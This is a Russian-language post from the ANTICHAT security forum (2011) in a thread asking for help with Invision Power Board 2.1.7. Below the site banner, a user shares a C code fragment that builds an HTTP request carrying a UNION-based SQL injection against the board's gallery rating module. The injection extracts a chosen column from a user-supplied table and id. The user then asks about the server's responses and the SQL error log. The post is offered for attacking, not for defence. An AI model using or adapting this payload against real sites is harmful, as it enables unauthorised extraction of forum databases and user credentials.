ipb 2.1.7 help — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

08.06.2011, 11:23

ICQ Hool

Участник форума

Регистрация: 31.03.2008

Сообщений: 143

Провел на форуме:
403124

Репутация: 95

C-r-A-c-K, есть еще скуль иньекция:

Код:

Code:
strcpy(exploit, "GET /"); 
    strcat(exploit, path); 
    strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
    strcat(exploit, column);
    strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
    strcat(exploit, prefix);
    strcat(exploit, table);
    strcat(exploit, "%20WHERE%20id=");
    strcat(exploit, id);
    strcat(exploit, "/*31337*/");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
    strcat(exploit, host); 
    strcat(exploit, "\r\n\r\n"); 
    Exploit(exploit, "sqlinject", host);

при правильно обращении меня кидает на форум и пишет что-то типа что у меня нет прав...

при неправильном запросе выскакивает ошибка, показывает префикс и.т.д

в правильном запросе запись могла попасть в sql_error_log с желаемым содержимым?

sql_error_log вообще есть в 2.1.7? не смог найти